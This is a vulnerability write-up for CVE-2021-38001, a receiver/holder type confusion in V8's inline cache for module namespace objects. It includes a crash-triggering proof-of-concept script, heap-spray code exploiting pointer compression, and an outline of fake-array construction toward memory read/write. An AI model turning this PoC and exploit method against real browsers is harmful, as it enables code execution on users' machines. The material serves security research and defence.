CVE-2021-38001

This bug was reported by @s0rrymybad in the Chrome category of TianfuCup 2021.

Introduction

Many recent V8 bugs are related to the property access mechanism.

This bug is quite similar to CVE-2021-30517, but before starting the root cause analysis we need to know how V8 internally handles property access operations. I will briefly review them in the following order =].

  • Property access bytecode handler
  • How to make Inline Cache for property access
  • Root cause analysis
  • Exploit strategy

Property access bytecode handler

Here is a simple property access example.

let o = {x: 1, y: 2};
o.x;

In this case, an LdaNamedProperty bytecode is generated, as in the following snippet.

 0x1f908293476 @    0 : 7c 00 00 29       CreateObjectLiteral [0], [0], #41
 0x1f90829347a @    4 : 25 02             StaCurrentContextSlot [2]
 0x1f90829347c @    6 : 16 02             LdaCurrentContextSlot [2]
 0x1f90829347e @    8 : c3                Star1
 0x1f90829347f @    9 : 2d f9 01 01       LdaNamedProperty r1, [1], [1]
 0x1f908293483 @   13 : c4                Star0
 0x1f908293484 @   14 : a9                Return

The LdaNamedProperty handler is defined in interpreter-generator.cc.

IGNITION_HANDLER(LdaNamedProperty, InterpreterAssembler) {
  TNode<HeapObject> feedback_vector = LoadFeedbackVector();
  // Load receiver.
  TNode<Object> recv = LoadRegisterAtOperandIndex(0);  // [0]
  ...
  LazyNode<Name> lazy_name = [=] {
    return CAST(LoadConstantPoolEntryAtOperandIndex(1));  // [1]
  };
  ...
  AccessorAssembler::LazyLoadICParameters params(lazy_context, recv, lazy_name,
                                                 lazy_slot, feedback_vector);
  AccessorAssembler accessor_asm(state());
  accessor_asm.LoadIC_BytecodeHandler(&params, &exit_point);  // [2]
  ...
}

It loads the receiver (recv) at [0] and the property name (lazy_name) at [1]; in this example the receiver is o and the name is x. It then calls LoadIC_BytecodeHandler at [2].

void AccessorAssembler::LoadIC_BytecodeHandler(const LazyLoadICParameters* p,
                                               ExitPoint* exit_point) {
  Label stub_call(this, Label::kDeferred), miss(this, Label::kDeferred),
      no_feedback(this, Label::kDeferred);

  GotoIf(IsUndefined(p->vector()), &no_feedback);

  TNode<Map> lookup_start_object_map =
      LoadReceiverMap(p->receiver_and_lookup_start_object());
  GotoIf(IsDeprecatedMap(lookup_start_object_map), &miss);

  // Inlined fast path.
  {
    Comment("LoadIC_BytecodeHandler_fast");

    TVARIABLE(MaybeObject, var_handler);
    Label try_polymorphic(this), if_handler(this, &var_handler);

    TNode<MaybeObject> feedback = TryMonomorphicCase(
        p->slot(), CAST(p->vector()), lookup_start_object_map, &if_handler,
        &var_handler, &try_polymorphic);

    BIND(&if_handler);
    HandleLoadICHandlerCase(p, CAST(var_handler.value()), &miss, exit_point);

    BIND(&try_polymorphic);
    {
      TNode<HeapObject> strong_feedback =
          GetHeapObjectIfStrong(feedback, &miss);
      GotoIfNot(IsWeakFixedArrayMap(LoadMap(strong_feedback)), &stub_call);
      HandlePolymorphicCase(lookup_start_object_map, CAST(strong_feedback),
                            &if_handler, &var_handler, &miss);
    }
  }

  BIND(&stub_call);
  {
    Comment("LoadIC_BytecodeHandler_noninlined");

    // Call into the stub that implements the non-inlined parts of LoadIC.
    Callable ic = Builtins::CallableFor(isolate(), Builtin::kLoadIC_Noninlined);
    TNode<Code> code_target = HeapConstant(ic.code());
    exit_point->ReturnCallStub(ic.descriptor(), code_target, p->context(),
                               p->receiver_and_lookup_start_object(), p->name(),
                               p->slot(), p->vector());
  }

  BIND(&no_feedback);
  {
    Comment("LoadIC_BytecodeHandler_nofeedback");
    // Call into the stub that implements the non-inlined parts of LoadIC.
    exit_point->ReturnCallStub(
        Builtins::CallableFor(isolate(), Builtin::kLoadIC_NoFeedback),
        p->context(), p->receiver(), p->name(),
        SmiConstant(FeedbackSlotKind::kLoadProperty));
  }

  BIND(&miss);
  {
    Comment("LoadIC_BytecodeHandler_miss");

    exit_point->ReturnCallRuntime(Runtime::kLoadIC_Miss, p->context(),
                                  p->receiver(), p->name(), p->slot(),
                                  p->vector());
  }
}

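Simply put, there are 5 cases to handle property access.

  1. If p->vector() is undefined (there is no feedback vector yet), it jumps to the no_feedback branch.
  2. If p->vector() exists, it checks whether lookup_start_object_map is deprecated; a deprecated map jumps to the miss branch.
  3. If lookup_start_object_map is not deprecated, it checks whether this is the monomorphic case for that map; if so, it jumps to if_handler.
  4. If it is not the monomorphic case, it checks whether this is the polymorphic case (the feedback is a WeakFixedArray); if so, it searches the array for the map and jumps to if_handler on a match, or to the miss branch otherwise.
  5. If the feedback is a strong heap object but not a WeakFixedArray, it jumps to the stub_call branch; if the feedback is not a strong heap object at all, it jumps to the miss branch.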
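
The branch selection above can be sketched as a small toy model in plain JavaScript. This is only an illustration of the control flow in the snippet: the object layout (`kind`, `map`, `entries`, `deprecated`) and the function name `selectBranch` are hypothetical and do not exist in V8.

```javascript
// Toy model of the branch selection in LoadIC_BytecodeHandler.
// Hypothetical data model: a "map" is a plain object, and a feedback slot is
// { kind: "weak_map", map }, { kind: "weak_fixed_array", entries }, or
// any other object standing in for "some other strong heap object".
function selectBranch(vector, slot, map) {
  if (vector === undefined) return "no_feedback"; // no feedback vector yet
  if (map.deprecated) return "miss";              // deprecated map

  const feedback = vector[slot];

  // Monomorphic check: the slot holds a weak reference to exactly this map.
  if (feedback.kind === "weak_map") {
    // A weak reference to a different map is not a strong heap object,
    // so the polymorphic check bails out to miss.
    return feedback.map === map ? "if_handler" : "miss";
  }

  // Polymorphic check: search the (map, handler) entries.
  if (feedback.kind === "weak_fixed_array") {
    return feedback.entries.some((e) => e.map === map) ? "if_handler" : "miss";
  }

  // Any other strong feedback is left to the non-inlined stub.
  return "stub_call";
}

const mapA = { deprecated: false };
const mapB = { deprecated: false };
const mapC = { deprecated: false };
const vector = [
  { kind: "weak_map", map: mapA },
  { kind: "weak_fixed_array", entries: [{ map: mapA }, { map: mapB }] },
  { kind: "other" },
];

console.log(selectBranch(undefined, 0, mapA)); // no_feedback
console.log(selectBranch(vector, 0, mapA));    // if_handler
console.log(selectBranch(vector, 1, mapC));    // miss
console.log(selectBranch(vector, 2, mapA));    // stub_call
```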

How to make Inline Cache for property access

As I said before, there is no feedback vector at first, so the handler ends up in AccessorAssembler::LoadIC_NoFeedback.

void AccessorAssembler::LoadIC_NoFeedback(const LoadICParameters* p,
                                          TNode<Smi> ic_kind) {
  Label miss(this, Label::kDeferred);
  TNode<Object> lookup_start_object = p->receiver_and_lookup_start_object();
  GotoIf(TaggedIsSmi(lookup_start_object), &miss);
  TNode<Map> lookup_start_object_map = LoadMap(CAST(lookup_start_object));
  GotoIf(IsDeprecatedMap(lookup_start_object_map), &miss);

  TNode<Uint16T> instance_type = LoadMapInstanceType(lookup_start_object_map);

  {
    // Special case for Function.prototype load, because it's very common
    // for ICs that are only executed once (MyFunc.prototype.foo = ...).
    Label not_function_prototype(this, Label::kDeferred);
    GotoIfNot(IsJSFunctionInstanceType(instance_type), &not_function_prototype);
    GotoIfNot(IsPrototypeString(p->name()), &not_function_prototype);

    GotoIfPrototypeRequiresRuntimeLookup(CAST(lookup_start_object),
                                         lookup_start_object_map,
                                         &not_function_prototype);
    Return(LoadJSFunctionPrototype(CAST(lookup_start_object), &miss));
    BIND(&not_function_prototype);
  }

  GenericPropertyLoad(CAST(lookup_start_object), lookup_start_object_map,
                      instance_type, p, &miss, kDontUseStubCache);

  BIND(&miss);
  {
    TailCallRuntime(Runtime::kLoadNoFeedbackIC_Miss, p->context(),
                    p->receiver(), p->name(), ic_kind);
  }
}

If lookup_start_object is not a Smi and its map is not deprecated, it generally calls GenericPropertyLoad. Its behavior is simple.

  1. Check whether lookup_start_object's instance type is special or whether the object is in dictionary mode.
  2. If the descriptor array exists and the property is found in it, it calls LoadPropertyFromFastObject and jumps to if_found_on_lookup_start_object.
  3. If not, it jumps to lookup_prototype_chain to find the property in the prototype chain.
  4. In cases [2] and [3], Runtime_LoadNoFeedbackIC_Miss is also called to install/update the feedback vector.

So after the property access has occurred a few times, the feedback vector is installed, and from then on the inline cache system uses it.
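
To make the miss-then-hit behavior concrete, here is a minimal toy inline cache. It is a sketch under a strong simplification: an object's "shape" is approximated by its ordered list of own keys, which only stands in for a V8 Map, and `shapeOf` and `makeLoadSite` are hypothetical names.

```javascript
// Toy inline cache for one property load site.
// The shape of an object is approximated by its ordered own keys.
function shapeOf(obj) {
  return Object.keys(obj).join(",");
}

function makeLoadSite(name) {
  const cache = new Map(); // shape -> handler
  const stats = { hits: 0, misses: 0 };

  function load(obj) {
    const shape = shapeOf(obj);
    let handler = cache.get(shape);
    if (handler === undefined) {
      // Slow path: compute a handler and install it for this shape.
      stats.misses++;
      handler = (o) => o[name];
      cache.set(shape, handler);
    } else {
      // Fast path: reuse the handler installed by an earlier miss.
      stats.hits++;
    }
    return handler(obj);
  }

  return { load, stats };
}

const site = makeLoadSite("x");
site.load({ x: 1, y: 2 }); // first time for this shape: miss
site.load({ x: 3, y: 4 }); // same shape: hit
site.load({ y: 5, x: 6 }); // different key order, different shape: miss
console.log(site.stats);
```

The important property for the rest of this analysis is that the handler is computed once on the slow path and then trusted on the fast path.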

Root cause analysis

The vulnerability patch commit is here.

As you can see, both accessor-assembler.cc and ic.cc are patched. When a cache miss occurs, ComputeHandler (in ic.cc) is called to update the cache, and the handler it installs is then consumed by the code generated from accessor-assembler.cc.

The bug is a type confusion between the receiver used in accessor-assembler.cc and the lookup_start_object (holder) used in ic.cc.

ic.cc updates the cache based on the lookup_start_object (holder), which is a JSModuleNamespace, but after the update the actual property access runs on the receiver object, which is not a JSModuleNamespace. So if the receiver and the lookup_start_object (holder) are different, a type confusion occurs.
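
The mismatch can be modelled in a few lines of plain JavaScript. This is a toy sketch, not V8 code and not the actual patch: objects are modelled as arrays of raw "slots", and all names (`computeHandler`, `loadViaReceiver`, `loadViaHolder`) are hypothetical.

```javascript
// Toy model: slot 0 of a namespace holds its module record, while slot 0 of
// an ordinary object holds whatever the script stored there.
const moduleRecord = { exports: ["cell for x", "cell for y", "cell for z"] };
const namespaceHolder = { type: "JSModuleNamespace", slots: [moduleRecord] };
const receiver = { type: "JSObject", slots: [0x42424242] };

// Miss path: the handler is computed from the holder.
function computeHandler(holder, exportIndex) {
  if (holder.type !== "JSModuleNamespace") {
    throw new Error("unexpected holder type");
  }
  return { kind: "module_export", index: exportIndex };
}

// Fast path in the style of the vulnerable code: the handler is applied to
// the receiver, whose slot 0 is assumed to be a module and never checked.
function loadViaReceiver(handler, receiverObject) {
  return receiverObject.slots[0];
}

// For contrast: the same load performed on the object the handler was
// computed for.
function loadViaHolder(handler, holder) {
  return holder.slots[0].exports[handler.index];
}

const handler = computeHandler(namespaceHolder, 1);
console.log(loadViaReceiver(handler, receiver).toString(16)); // 42424242
console.log(loadViaHolder(handler, namespaceHolder));         // cell for y
```

In the toy model the wrong "module" is just a number; in V8 it is a value that the fast path goes on to dereference as a pointer.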

If you write a correct poc, the crash occurs in AccessorAssembler::HandleLoadICSmiHandlerLoadNamedCase.

First, we need to access some property that lives on a JSModuleNamespace.

// 1.mjs
export let x = {};
export let y = {};
export let z = {};

// 2.mjs
// run "./d8 --allow-natives-syntax ./2.mjs"
import * as module from "1.mjs";
%DebugPrint(module)

/*
DebugPrint: 0x2a9a0810a849: [JSModuleNamespace]
 - map: 0x2a9a082c7cf9 <Map(DICTIONARY_ELEMENTS)> [DictionaryProperties]
 - prototype: 0x2a9a08002235 <null>
 - elements: 0x2a9a0810a8d9 <NumberDictionary[16]> [DICTIONARY_ELEMENTS]
 - module: 0x2a9a08293745 <Other heap object (SOURCE_TEXT_MODULE_TYPE)>
 - properties: 0x2a9a0810a85d <NameDictionary[29]>
 - All own properties (excluding elements): {
   0x2a9a08005be5 <Symbol: Symbol.toStringTag>: 0x2a9a08004d59 <String[6]: #Module> (data, dict_index: 1, attrs: [___])
   x: 0x2a9a08293825 <AccessorInfo> (accessor, dict_index: 2, attrs: [WE_])
   z: 0x2a9a08293865 <AccessorInfo> (accessor, dict_index: 4, attrs: [WE_])
   y: 0x2a9a08293845 <AccessorInfo> (accessor, dict_index: 3, attrs: [WE_])
 }
 - elements: 0x2a9a0810a8d9 <NumberDictionary[16]> {
   - requires_slow_elements
 }
0x2a9a082c7cf9: [Map]
 - type: JS_MODULE_NAMESPACE_TYPE
 ...
*/

JSModuleNamespace is the type of the module object in the snippet above. This module object must be the holder in ComputeHandler, which I can arrange by putting it on another object's prototype chain. The following is the poc for this vulnerability.

import * as module from "1.mjs";

function poc() {
    class C {
        m() {
            return super.y;
        }
    }

    let zz = {aa: 1, bb: 2};
    // receiver vs holder type confusion
    function trigger() {
        // set lookup_start_object
        C.prototype.__proto__ = zz;
        // set holder
        C.prototype.__proto__.__proto__ = module;

        // "c" is receiver in ComputeHandler [ic.cc]
        // "module" is holder
        // "zz" is lookup_start_object
        let c = new C();

        c.x0 = 0x42424242 / 2;
        c.x1 = 0x42424242 / 2;
        c.x2 = 0x42424242 / 2;
        c.x3 = 0x42424242 / 2;
        c.x4 = 0x42424242 / 2;

        // LoadWithReceiverIC_Miss
        // => UpdateCaches (Monomorphic)
        // CheckObjectType with "receiver"
        let res = c.m();
    }
    
    for (let i = 0; i < 0x100; i++) {
        trigger();
    }
}

poc();

void AccessorAssembler::HandleLoadICSmiHandlerLoadNamedCase(
  
  ...
    
  BIND(&module_export);
  {
    Comment("module export");
    TNode<UintPtrT> index =
        DecodeWord<LoadHandler::ExportsIndexBits>(handler_word);
    TNode<Module> module =
        LoadObjectField<Module>(CAST(p->receiver()), JSModuleNamespace::kModuleOffset);  // [0]
    TNode<ObjectHashTable> exports =
        LoadObjectField<ObjectHashTable>(module, Module::kExportsOffset);
    TNode<Cell> cell = CAST(LoadFixedArrayElement(exports, index));
    // The handler is only installed for exports that exist.
    TNode<Object> value = LoadCellValue(cell);
    Label is_the_hole(this, Label::kDeferred);
    GotoIf(IsTheHole(value), &is_the_hole);
    exit_point->Return(value);

    ...
  
  }

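Although [0] expects a JSModuleNamespace, the receiver (c in the poc) is an ordinary object. So the value loaded as module at [0] is one of c's in-object Smi property fields, whose raw value is 0x42424242, and the following load of exports dereferences that bogus pointer. This is the type confusion, and it ends in a crash.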
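
The poc stores 0x42424242 / 2 rather than 0x42424242 because of Smi tagging. A minimal sketch of the arithmetic, assuming a pointer-compression build where a Smi is a 31-bit integer stored shifted left by one with the low tag bit cleared (`smiTag` is a hypothetical helper name):

```javascript
// Raw 32-bit field contents for a Smi under the assumption stated above:
// the integer value shifted left by one, low (tag) bit zero.
function smiTag(value) {
  return (value << 1) >>> 0;
}

const stored = 0x42424242 / 2; // 0x21212121, the value the poc assigns
const raw = smiTag(stored);    // what actually sits in the property field

console.log(stored.toString(16)); // 21212121
console.log(raw.toString(16));    // 42424242
```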

Exploit strategy

First, to build a fake object, we need to know where it is located. We don't have a memory leak primitive yet, but thanks to pointer compression in V8 we can easily solve this problem with a heap spray.

Heap spray

Before pointer compression was introduced, no matter how carefully we sprayed the heap, it was very hard to guess a sprayed address because we had to guess the whole address (generally 6 bytes).

But with pointer compression, we don't need to know the high 2 bytes!

            |----- 32 bits -----|----- 32 bits -----|
Pointer:    |________base_______|______offset_____w1|

Because the base value is fixed when the isolate is instantiated, we only have to guess the low 4 bytes (the offset).
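
As a small worked example, the address printed by %DebugPrint earlier (0x2a9a0810a849) can be split into these two halves. This is a sketch that assumes the base is 4 GiB aligned, so that combining base and offset is a plain OR; `splitPointer` and `decompress` are hypothetical helper names.

```javascript
// Split a full 64-bit pointer into its cage base and 32-bit offset.
// BigInt is used because the value does not fit in 32-bit integer operations.
const OFFSET_MASK = 0xffffffffn;

function splitPointer(fullPointer) {
  return {
    base: fullPointer & ~OFFSET_MASK,  // upper half, fixed per isolate
    offset: fullPointer & OFFSET_MASK, // lower half, the compressed pointer
  };
}

// Assumes a 4 GiB aligned base, so OR and addition give the same result.
function decompress(base, offset) {
  return base | offset;
}

const parts = splitPointer(0x2a9a0810a849n);
console.log(parts.base.toString(16));   // 2a9a00000000
console.log(parts.offset.toString(16)); // 810a849
console.log(decompress(parts.base, parts.offset).toString(16)); // 2a9a0810a849
```

Only the offset half has to be predicted by the spray; the base half never appears in compressed fields.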

I didn't fully analyze why this happens, but sprayed objects usually land in a similar region on macOS and Linux (in both d8 and Chrome).

            |----- 32 bits -----|----- 32 bits -----|
Pointer:    |________base_______|_____0x083xxxxx____|

Thus, it is quite easy to guess sprayed heap address :)

var victim_array = [];
victim_array.length = 0x1000;

var double_array = [1.1];
double_array.length = 0x10000;
double_array.fill(1.1);

function spray_heap() {
    for(var i = 0;i < victim_array.length;i++){
        victim_array[i] = double_array.slice(0,double_array.length);
    }
}

spray_heap();
%DebugPrint(double_array);

Exploit

After getting the address of the sprayed objects, we need to build a fake object. We usually build a fake PACKED_DOUBLE_ELEMENTS array and read/write the caged region (addressed by compressed pointers) by switching its elements field.

There are 2 options for making the PACKED_DOUBLE_ELEMENTS array.

  1. Basic Maps have static low 32-bit values, so we can use them without any memory leak. (But these values differ from version to version and device to device.)
  2. Build a fake Map and make the fake object with that Map.
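
Either way, the fake object's fields are 32-bit values that have to be written through a double array, so two of them are packed into one 64-bit double. The helpers below are a generic sketch of that conversion, assuming a little-endian machine; the names `pairToDouble` and `doubleToPair` are hypothetical, and the two constants are placeholders, not real Map or pointer values.

```javascript
// Reinterpret two 32-bit values as one double and back, using typed-array
// views over the same 8-byte buffer. Assumes little-endian byte order, so
// u32[0] is the low half and u32[1] is the high half.
const buffer = new ArrayBuffer(8);
const f64 = new Float64Array(buffer);
const u32 = new Uint32Array(buffer);

function pairToDouble(low, high) {
  u32[0] = low;
  u32[1] = high;
  return f64[0];
}

function doubleToPair(value) {
  f64[0] = value;
  return [u32[0], u32[1]];
}

// Placeholder values only.
const packed = pairToDouble(0x11111111, 0x22222222);
const [low, high] = doubleToPair(packed);
console.log(low.toString(16), high.toString(16)); // 11111111 22222222
```

Bit patterns that decode to NaN may not survive a round trip through a JavaScript number, which is one reason to prefer values whose upper half is not a NaN exponent.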

I used method [1] just to make a reference exploit.
You can see my exploit here.
So if you want a stable exploit, I think you have to use the second method :)